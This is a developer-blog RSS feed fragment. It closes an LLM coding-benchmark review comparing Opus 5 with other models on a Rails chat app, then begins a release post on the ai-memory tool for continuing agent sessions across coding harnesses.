          <td style="text-align: center">❌</td>
          <td style="text-align: right">43m</td>
          <td style="text-align: right">local</td>
      </tr>
      <tr>
          <td style="text-align: right">39</td>
          <td>Qwen 3 Coder Next</td>
          <td style="text-align: right">32</td>
          <td style="text-align: center">D</td>
          <td style="text-align: center">❌</td>
          <td style="text-align: right">17m</td>
          <td style="text-align: right">local</td>
      </tr>
      <tr>
          <td style="text-align: right">40</td>
          <td>Grok 4.20</td>
          <td style="text-align: right">25</td>
          <td style="text-align: center">D</td>
          <td style="text-align: center">❌</td>
          <td style="text-align: right">8m</td>
          <td style="text-align: right">~$0.70</td>
      </tr>
      <tr>
          <td style="text-align: right">41</td>
          <td>GPT OSS 20B</td>
          <td style="text-align: right">11</td>
          <td style="text-align: center">D</td>
          <td style="text-align: center">❌</td>
          <td style="text-align: right">failed</td>
          <td style="text-align: right">local</td>
      </tr>
  </tbody>
</table>
<p>* Opus 5 received an equivalent 95/100 in the Claude Code profile. The repository&rsquo;s main table keeps it separate to make the harness difference explicit.</p>
<h2>What Opus 5 wrote<span class="hx:absolute hx:-mt-20" id="what-opus-5-wrote"></span>
    <a href="#what-opus-5-wrote" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The score alone hides the good part. Opus 5&rsquo;s project is the best example of defensive engineering to show up in this benchmark so far.</p>
<p>It isolated all RubyLLM access in one <code>Assistant::Client</code>, injected the chat factory for tests, and verified the gem&rsquo;s real API before depending on it. Besides mocking <code>RubyLLM.chat</code>, <code>with_instructions</code>, <code>add_message</code>, and <code>ask</code>, it created a guard test that confirms those methods still exist in the installed gem. If the library changes its interface, CI breaks before production does.</p>
<p>The conversation sits behind a <code>ConversationRepository</code> in <code>Rails.cache</code>, with a 12-hour TTL and a 40-message replay limit. Before sending history to the provider, it normalizes role alternation between <code>user</code> and <code>assistant</code>, removes failed replies, and makes sure the window does not begin with an assistant message. That sounds like trivia right up until the API rejects the payload on turn two.</p>
<p>That is exactly where the model found and fixed two bugs during its own run. A failed reply could leave two user messages in a row. Trimming the history window could also make it begin with an assistant reply. It wrote tests, fixed both, and validated real multi-turn behavior, including recovery after a failure.</p>
<p>It also delivered:</p>
<ul>
<li>streaming outside the main request;</li>
<li>signed Turbo Streams broadcasts throttled to roughly 10 updates per second;</li>
<li>credential preflight;</li>
<li>different messages for an invalid key, rate limits, depleted credits, blown context, and provider downtime;</li>
<li>Markdown escaped before formatting HTML;</li>
<li>a multi-stage, production, non-root Dockerfile;</li>
<li>RuboCop, Brakeman, bundler-audit, importmap audit, and GitHub Actions.</li>
</ul>
<p>It is not a 100. There is a lost-update race if another message arrives during generation, although the project itself constrains deployment to <code>WEB_CONCURRENCY=1</code>. It also left the default model on Sonnet 4.6 after Sonnet 5 was already available, and committed <code>log/</code> and <code>coverage/</code> cruft inside the artifact. Those deductions held it at 95.</p>
<h2>Opus 5 against Opus 4.8 and Fable 5<span class="hx:absolute hx:-mt-20" id="opus-5-against-opus-48-and-fable-5"></span>
    <a href="#opus-5-against-opus-48-and-fable-5" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>First, the numbers from our test:</p>
<table>
  <thead>
      <tr>
          <th>Model</th>
          <th style="text-align: right">Score</th>
          <th style="text-align: right">Time</th>
          <th style="text-align: right">Tests</th>
          <th>Persistence</th>
          <th style="text-align: right">API rate</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Opus 5</td>
          <td style="text-align: right">95</td>
          <td style="text-align: right">39m</td>
          <td style="text-align: right">121</td>
          <td>Rails.cache, TTL, limited replay</td>
          <td style="text-align: right">$5 / $25</td>
      </tr>
      <tr>
          <td>Opus 4.8</td>
          <td style="text-align: right">95</td>
          <td style="text-align: right">17m</td>
          <td style="text-align: right">34</td>
          <td>session cookie with no cap</td>
          <td style="text-align: right">$5 / $25</td>
      </tr>
      <tr>
          <td>Fable 5</td>
          <td style="text-align: right">94</td>
          <td style="text-align: right">24m</td>
          <td style="text-align: right">36</td>
          <td>capped local singleton</td>
          <td style="text-align: right">$10 / $50</td>
      </tr>
      <tr>
          <td>Fable 5 (re-release)</td>
          <td style="text-align: right">93</td>
          <td style="text-align: right">18m</td>
          <td style="text-align: right">41</td>
          <td>Rails.cache with TTL, no hard cap</td>
          <td style="text-align: right">$10 / $50</td>
      </tr>
  </tbody>
</table>
<p><a href="/en/2026/06/01/llm-benchmarks-grok-4-3-minimax-m3-opus-4-8/">Opus 4.8 had scored 95</a> with a smaller solution that finished much faster. It used the correct API, wrote honest tests, and performed the best live validation in that round: local Rails, a real OpenRouter call, Docker, a production container, and Compose. It lost points for leaving cookie history unbounded and skipping an API-key preflight.</p>
<p>Opus 5 fixed both defects and went much further on architecture, streaming, and tests. On the other hand, it created a different race, left the model pin stale, and took more than twice as long. Same score, very different artifacts.</p>
<p><a href="/en/2026/06/11/llm-benchmark-fable-5-anthropic-soap-opera/">The original Fable 5 scored 94</a>. It was the first model I saw stop in the middle of the job to read RubyLLM&rsquo;s installed source before writing the integration. It had 99.3% coverage, capped history, preflight, and a phase 2 that needed no fixes. The big deduction came from storing conversations in an in-memory singleton: restart the process and everything is gone; add a second worker and each one sees a different world.</p>
<p>The Fable re-release fixed that with <code>Rails.cache</code>, but left the cache without a hard cap, kept Sonnet 4.6, and performed weaker live validation. It dropped one point. Same model ID, another project, another score.</p>
<p>Within the boundaries of this Rails app, Opus 5 looks more complete than both Fable runs and at least as good as Opus 4.8. Just do not confuse that with &ldquo;Opus 5 is more intelligent than Fable.&rdquo; Anthropic says Fable&rsquo;s advantage grows as tasks get longer and more complex. Our project is small, greenfield, and closed-ended. There may simply be no room here for that difference to show.</p>
<h2>The price: half of Fable, but mind the bill<span class="hx:absolute hx:-mt-20" id="the-price-half-of-fable-but-mind-the-bill"></span>
    <a href="#the-price-half-of-fable-but-mind-the-bill" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>On the API, the advantage is straightforward:</p>
<table>
  <thead>
      <tr>
          <th>Model</th>
          <th style="text-align: right">Input / million</th>
          <th style="text-align: right">Output / million</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Opus 5</td>
          <td style="text-align: right">$5</td>
          <td style="text-align: right">$25</td>
      </tr>
      <tr>
          <td>Opus 4.8</td>
          <td style="text-align: right">$5</td>
          <td style="text-align: right">$25</td>
      </tr>
      <tr>
          <td>Fable 5</td>
          <td style="text-align: right">$10</td>
          <td style="text-align: right">$50</td>
      </tr>
  </tbody>
</table>
<p>If Opus 5 really delivers near-Fable behavior on your workload, paying twice as much for Fable is hard to justify. Fable needs to solve something Opus cannot, not merely carry the name of the tier above it.</p>
<p>But the observed cost of this run tells a different story:</p>
<table>
  <thead>
      <tr>
          <th>Model</th>
          <th>Harness</th>
          <th style="text-align: right">Run cost</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Opus 5</td>
          <td>Claude Code / Max</td>
          <td style="text-align: right">subscription (≈$16.02 at API rates)</td>
      </tr>
      <tr>
          <td>Opus 4.8</td>
          <td>OpenCode / OpenRouter</td>
          <td style="text-align: right">~$6.40</td>
      </tr>
      <tr>
          <td>Fable 5</td>
          <td>OpenCode / OpenRouter</td>
          <td style="text-align: right">~$11.20</td>
      </tr>
  </tbody>
</table>
<p>How did a model with half Fable&rsquo;s rate end up with a higher equivalent cost? Because price per million is not cost per task. The Opus 5 run took 201 turns and accumulated 22.1 million cache reads in Claude Code. The Fable run used another harness and another token profile. Comparing $16.02 with $11.20 as if the model were the only variable would be flat-out wrong.</p>
<p>For me, as a Max subscriber, the real marginal cost was zero while I remained inside the allowance. For automation that pays API rates per token, Opus 5 costs half as much as Fable and the same as 4.8. I would start with Opus 5 and move up to Fable only with evidence that the task needs it.</p>
<h2>Against GPT 5.6 Sol and Kimi K3<span class="hx:absolute hx:-mt-20" id="against-gpt-56-sol-and-kimi-k3"></span>
    <a href="#against-gpt-56-sol-and-kimi-k3" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p><a href="/en/2026/07/09/llm-benchmark-grok-4-5-gpt-5-6-sol/">GPT 5.6 Sol scored 92</a> in 17 minutes. It was far more token-efficient and delivered a defensive application: a non-root Docker image, 99.2% coverage, history bounded by messages, characters, and bytes, plus a specific test to keep the current prompt from being repeated in context.</p>
<p>It lost points because it never used <code>with_instructions</code> and carried history in a hidden field in the browser. That works, but the conversation disappears on reload and the client can tamper with the context. Opus 5 put those responsibilities on the server, separated domain, persistence, and provider more cleanly, and tested far more. On this project, the three-point difference makes sense. In daily use, both remain in the same cluster of strong models.</p>
<p><a href="/en/2026/07/17/llm-benchmarks-kimi-k3/">Kimi K3 scored 89</a> in 26 minutes. It had already nailed the pattern that decides much of the top end: <code>Rails.cache</code>, a TTL, and a history cap. It cost only about $2.10 at equivalent API rates through the Moderato subscription.</p>
<p>It landed lower because it had no system prompt, put LLM I/O inside the <code>Conversation</code> model, skipped credential preflight, and left the production cache on the container&rsquo;s ephemeral default. Opus 5 closes nearly all of those gaps. Kimi remains a much cheaper Tier A alternative; Opus 5 is the project I would need to touch less before trusting it.</p>
<h2>Opus 5 also dethroned the old champion<span class="hx:absolute hx:-mt-20" id="opus-5-also-dethroned-the-old-champion"></span>
    <a href="#opus-5-also-dethroned-the-old-champion" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>There is one important change in the table that did not come from the new code. Until yesterday, Opus 4.7 sat in first place with 97. The blind cross-audit between it and Opus 5 came back <strong>94 to 70</strong> in favor of 5. I went back and read the old artifacts.</p>
<p>Opus 4.7 had a double-send bug: the controller stored the user&rsquo;s message before calling the service, and the service replayed the entire history, including that same message. Every prompt reached the LLM twice. Error messages also returned in the context of future requests, and the cookie had a message-count limit but no byte limit.</p>
<p>The tests passed because controller and service were tested under arrangements that differed from the production flow. The model did not get worse since April. The project did not change either. <strong>My audit was incomplete.</strong> I recalculated the score from 97 to 87.</p>
<p>That is almost comical, because last week&rsquo;s article used &ldquo;why is Opus 4.7 above 4.8 and Fable?&rdquo; as its exact example. It is not anymore. And the article&rsquo;s argument just got stronger.</p>
<p>A benchmark is not holy writ. The rubric evolves, the auditor finds a blind spot, the harness changes, the same model generates another project. If a table does not publish the prompt, artifact, logs, and corrections, it is more useful for marketing than engineering.</p>
<h2>Conclusion<span class="hx:absolute hx:-mt-20" id="conclusion"></span>
    <a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Is Opus 5 any good? <strong>Yes.</strong> Very.</p>
<p>It scored 95/A, tied Opus 4.8 and GPT 5.4, landed one point above the original Fable, three above GPT 5.6 Sol, and six above Kimi K3. It produced the most careful project in this entire round: clean architecture, RubyLLM verified against the real gem, correct history, solid streaming, separate error handling, and 121 tests.</p>
<p>It also took 39 minutes, burned 22 million cache reads, and ran in a different harness. Scoring higher than Fable does not prove it is better than Fable overall. It proves that, on this Rails app, in this Claude Code run, under this audit, the artifact fit the rubric a little better.</p>
<p>My practical read: Opus 5 deserves to be the first option. Its API rate is the same as Opus 4.8 and half Fable&rsquo;s. For anyone with Claude Pro or Max, it is the obvious choice before spending credits on Fable. If you pay API rates, I would still start there and demand data before moving up to the $10/$50 tier.</p>
<p>And the rule stays the same: read 90+ as a group. Tier A is clearly above Tier C on this workload. Within the good group, choose by cost, subscription, speed, harness, and the kind of defect you are willing to review.</p>
<p>Do not use my benchmark to decide which model is &ldquo;the best LLM.&rdquo; Use it to decide what is worth testing on your problem. If the decision matters, run your own methodology more than once, and read the code.</p>
]]></content:encoded><category>llm-benchmarks</category><category>llms</category><category>coding-agents</category></item><item><title>What's New in My AI-MEMORY: Switch AI Agents Without Losing the Session</title><link>https://www.akitaonrails.com/en/2026/07/20/whats-new-ai-memory-switch-agents-without-losing-session/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/07/20/whats-new-ai-memory-switch-agents-without-losing-session/</guid><pubDate>Mon, 20 Jul 2026 21:00:00 GMT</pubDate><description>&lt;p&gt;It&amp;rsquo;s been a little over a month since I published &lt;a href="https://www.akitaonrails.com/en/2026/06/16/ai-memory-long-term-memory-karpathy-wiki-self-improvement-hermes-projects/"&gt;ai-memory: long-term memory (Karpathy Wiki) and self-improvement (Hermes) for your projects&lt;/a&gt;. That was June 16. In that post I explained how sessions became Markdown pages, how auto-improve promoted lessons, and why bad memory can be worse than amnesia.&lt;/p&gt;
&lt;p&gt;Version 1.1.0 shipped that same day. Today, July 20, we&amp;rsquo;re at &lt;strong&gt;1.17.1&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Version numbers alone don&amp;rsquo;t mean much, so I counted what actually happened after that post went live: &lt;strong&gt;31 releases, 55 merged pull requests, and 46 closed issues&lt;/strong&gt;. I counted &lt;strong&gt;24 groups of new user-facing features&lt;/strong&gt; in the &lt;a href="https://github.com/akitaonrails/ai-memory/blob/main/CHANGELOG.md"target="_blank" rel="noopener"&gt;CHANGELOG&lt;/a&gt;, ignoring fixes, documentation, and internal details from the same delivery. If I split the new &lt;code&gt;ai-memory run&lt;/code&gt; family into auto-selection, session adoption, Crush support, &lt;code&gt;--yolo&lt;/code&gt;, search, and recovery, we&amp;rsquo;d blow past that number.&lt;/p&gt;</description><content:encoded><![CDATA[<p>It&rsquo;s been a little over a month since I published <a href="/en/2026/06/16/ai-memory-long-term-memory-karpathy-wiki-self-improvement-hermes-projects/">ai-memory: long-term memory (Karpathy Wiki) and self-improvement (Hermes) for your projects</a>. That was June 16. In that post I explained how sessions became Markdown pages, how auto-improve promoted lessons, and why bad memory can be worse than amnesia.</p>
<p>Version 1.1.0 shipped that same day. Today, July 20, we&rsquo;re at <strong>1.17.1</strong>.</p>
<p>Version numbers alone don&rsquo;t mean much, so I counted what actually happened after that post went live: <strong>31 releases, 55 merged pull requests, and 46 closed issues</strong>. I counted <strong>24 groups of new user-facing features</strong> in the <a href="https://github.com/akitaonrails/ai-memory/blob/main/CHANGELOG.md"target="_blank" rel="noopener">CHANGELOG</a>, ignoring fixes, documentation, and internal details from the same delivery. If I split the new <code>ai-memory run</code> family into auto-selection, session adoption, Crush support, <code>--yolo</code>, search, and recovery, we&rsquo;d blow past that number.</p>
<p>Fifteen people had PRs merged during that period, fourteen besides me. Special thanks go to <a href="https://github.com/djalmajr"target="_blank" rel="noopener">Djalma Júnior</a>, who alone had 24 PRs merged, <a href="https://github.com/matheus-rodrigues00"target="_blank" rel="noopener">Matheus Rodrigues</a>, with five, <a href="https://github.com/lhzapata"target="_blank" rel="noopener">lhzapata</a>, with four, <a href="https://github.com/rthiago"target="_blank" rel="noopener">Thiago Silva</a> and <a href="https://github.com/cristianodewes"target="_blank" rel="noopener">Cristiano Dewes</a>, with two each. Nine more contributors had a PR merged. This stopped being &ldquo;a little program I made over a weekend&rdquo; a while ago.</p>
<p>I&rsquo;m not going to dump 55 PRs here. I want to talk about the change that affects my daily use the most: the new <strong><code>ai-memory run</code></strong>.</p>
<h2>The session is part of the project too<span class="hx:absolute hx:-mt-20" id="the-session-is-part-of-the-project-too"></span>
    <a href="#the-session-is-part-of-the-project-too" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Code is the result that survived. It doesn&rsquo;t preserve the entire investigation.</p>
<p>Git shows that you replaced Redis with SQLite. Maybe the commit explains part of it. But where is the Redis experiment? Where is the intermittent bug that only showed up with two workers? Who remembered that the first solution broke on Windows? Why did the team change its mind after three hours? Which workaround was temporary, and which one became the decision?</p>
<p>Much of that exists only in the agent session.</p>
<p>When I program with Claude Code or Codex, the session accumulates the project&rsquo;s operational reasoning: questions, corrections, discarded attempts, test results, surprises, decisions, and changes in direction. The final code shows what stayed. The session explains how we got there.</p>
<p>And an LLM session, at the end of the day, is text. Claude Code writes JSONL. Codex does too. OpenCode uses SQLite. Pi, OMP, and Crush have their own formats and directories. Each harness packages the conversation differently, but the visible content is still messages and tool results.</p>
<p>Why should I leave the most expensive part of the work trapped inside the harness?</p>
<p>Anthropic can change limits, pricing, models, or formats tomorrow. OpenAI can too. An agent can be excellent this week and unbearable the next. I want to swap the engine without throwing away the whole trip.</p>
<p>That has been ai-memory&rsquo;s thesis from the start: <strong>the programmer must remain independent of provider whims</strong>. Models and harnesses are replaceable. The project memory is mine.</p>
<h2>Handoffs solved only half the problem<span class="hx:absolute hx:-mt-20" id="handoffs-solved-only-half-the-problem"></span>
    <a href="#handoffs-solved-only-half-the-problem" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>ai-memory already handled handoffs. I would close Claude Code, the hooks would consolidate the session, and the next Codex would receive a short summary with what had been done, open questions, and next steps.</p>
<p>That still exists and is still useful. Anyone who opens <code>claude</code>, <code>codex</code>, or <code>opencode</code> directly keeps the previous behavior. The new launcher is opt-in.</p>
<p>But a handoff is deliberately lossy compression. It preserves what seems most important at that moment. It isn&rsquo;t meant to carry the entire session or resume each harness&rsquo;s native session. If the summary left out an old attempt that became relevant again two hours later, you have to search the wiki or the records.</p>
<p><code>ai-memory run</code> adds another layer: a <strong>managed workstream</strong>, one line of work that crosses harnesses.</p>
<h2>Claude now, Codex in a little while<span class="hx:absolute hx:-mt-20" id="claude-now-codex-in-a-little-while"></span>
    <a href="#claude-now-codex-in-a-little-while" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Basic usage looks like this:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">cd</span> ~/Projects/meu-projeto
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">ai-memory run claude
</span></span><span class="line"><span class="cl"><span class="c1"># work, then exit Claude Code normally</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">ai-memory run codex --yolo
</span></span><span class="line"><span class="cl"><span class="c1"># Codex continues the same line of work</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">ai-memory run claude --model opus
</span></span><span class="line"><span class="cl"><span class="c1"># return to Claude&#39;s previous native session</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">ai-memory run
</span></span><span class="line"><span class="cl"><span class="c1"># or let ai-memory choose the right harness to continue</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>You don&rsquo;t need <code>--</code> to separate arguments. Everything after the harness name goes to it, with one deliberate exception: <code>--yolo</code> belongs to the wrapper and is translated into the native dangerous option for Claude Code, Codex, OpenCode, Pi, or Crush.</p>
<p>Under the hood, ai-memory doesn&rsquo;t try to convert a Codex file into a Claude file. That would be fragile and would probably break on the next update. Each harness keeps its own native session. The workstream connects those sessions to a portable ledger containing the visible part of the conversation.</p>
<p>Think of it this way:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">Claude native session ─┐
</span></span><span class="line"><span class="cl">Codex native session  ─┼─ workstream ─ portable context
</span></span><span class="line"><span class="cl">OpenCode session      ─┤                 + full search
</span></span><span class="line"><span class="cl">Pi native session     ─┘</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>The first time Claude enters that workstream, it gets a native session. When you switch to Codex, Codex gets its own native session and receives the portable delta it hasn&rsquo;t seen yet. When you return to Claude, the launcher uses Claude Code&rsquo;s own <code>--resume</code> and delivers only what happened in the other harnesses since the last visit.</p>
<p>This is very different from starting a new chat with a summary pasted into the prompt. Claude returns to its real session. Codex returns to its real session. ai-memory handles continuity between the two.</p>
<p>Managed mode currently supports <strong>Claude Code, Codex, OpenCode, Pi, Crush, and OMP</strong>. General ai-memory support is broader, with MCP and hooks for other clients, but that doesn&rsquo;t mean every client already has a native-session adapter for <code>run</code>. Those are different contracts, and I prefer to make that explicit.</p>
<h2>What goes into the workstream<span class="hx:absolute hx:-mt-20" id="what-goes-into-the-workstream"></span>
    <a href="#what-goes-into-the-workstream" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>When the harness exits, ai-memory reads the tail of the native session without modifying the original store. It imports visible user and assistant messages, completed tool calls with their results, compaction summaries, and a non-mutating Git checkpoint. Every event keeps its origin: Claude, Codex, OpenCode, Pi, Crush, or OMP.</p>
<p>Provider credentials, encrypted records, system and developer prompts, and hidden reasoning stay out. Private formats the adapter doesn&rsquo;t understand stay out too and produce a loss annotation instead of letting the system pretend it imported everything.</p>
<p>Records pass through the sanitizer before entering ai-memory&rsquo;s searchable ledger and immutable JSONL segments. The adapter opens native stores read-only; the harness itself remains the writer.</p>
<p>I don&rsquo;t cram the entire session into the next prompt either. That would recreate the problem the project is trying to solve: too much raw context, too much cost, and too much noise. The next agent gets a size-limited recent delta. If an old decision matters again, the full ledger remains searchable:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ai-memory workstream-search <span class="s2">&#34;por que desistimos do Redis&#34;</span>
</span></span><span class="line"><span class="cl">ai-memory workstream-search --limit <span class="m">50</span> --json <span class="s2">&#34;migration que falhou&#34;</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Inside an <code>ai-memory run</code>, the workstream ID is already in the environment. The agent doesn&rsquo;t have to discover some UUID.</p>
<p>And the ledger doesn&rsquo;t replace the wiki. It handles operational continuity. Decisions, rules, procedures, and gotchas that need to survive for months still deserve consolidated Markdown pages. A raw session is evidence. A wiki is organized knowledge.</p>
<h2>Can I keep more than one line of work?<span class="hx:absolute hx:-mt-20" id="can-i-keep-more-than-one-line-of-work"></span>
    <a href="#can-i-keep-more-than-one-line-of-work" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Yes. The default workstream is called <code>default</code>, selected by repository and worktree. If I want an independent line for an investigation without contaminating the main work:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ai-memory run --new investigar-race claude
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># later, continue that line with another harness</span>
</span></span><span class="line"><span class="cl">ai-memory run --workstream investigar-race codex</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>A lease prevents two windows from writing to the same workstream at once. On a normal exit, the launcher imports the tail of the session and releases it immediately. If someone kills the process without cleanup, the lease expires within 90 seconds and the next run resumes from the last confirmed cursor without duplicating imported events.</p>
<p>One stupid annoyance kept coming back: I would reopen a project after a few days and have no idea whether the newest session was in Claude or Codex. I&rsquo;d guess, open one, realize the context was in the other, close it, and try again.</p>
<p>Now I just run:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ai-memory run
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># or keep the same auto-selection in YOLO mode</span>
</span></span><span class="line"><span class="cl">ai-memory run --yolo</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>In an empty workstream, ai-memory looks for local sessions from that checkout in Claude Code, Codex, OpenCode, Pi, and Crush, finds the newest one, and opens the right harness for me. In an established workstream, server memory beats the file timestamp: it returns to the last harness attached to that work instead of accidentally adopting an old session that happened to receive a newer write. OMP remains available when selected explicitly, but it doesn&rsquo;t participate in auto-selection yet.</p>
<p>On the first explicit run, the launcher can also offer existing sessions from the same checkout for adoption. You can start using it without abandoning the chat that was already open before you updated ai-memory.</p>
<h2>Other new features I actually use<span class="hx:absolute hx:-mt-20" id="other-new-features-i-actually-use"></span>
    <a href="#other-new-features-i-actually-use" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>I promised I wouldn&rsquo;t read the entire changelog out loud, but a few changes from this month deserve a mention because they reduce work for the programmer.</p>
<h3>A briefing before the first question<span class="hx:absolute hx:-mt-20" id="a-briefing-before-the-first-question"></span>
    <a href="#a-briefing-before-the-first-question" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>A project can request an automatic briefing at the start of every session:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-toml" data-lang="toml"><span class="line"><span class="cl"><span class="p">[</span><span class="nx">briefing</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="nx">inject_on_session_start</span> <span class="p">=</span> <span class="s2">&#34;true&#34;</span>
</span></span><span class="line"><span class="cl"><span class="nx">max_chars</span> <span class="p">=</span> <span class="mi">4000</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>ai-memory assembles a package with pinned pages, <code>_rules/</code>, <code>_slots/</code>, and recent titles. The agent starts with the project&rsquo;s rules and basic state instead of spending the first conversation rediscovering the architecture. It&rsquo;s opt-in because it consumes context on every SessionStart, including after a Claude <code>/clear</code>.</p>
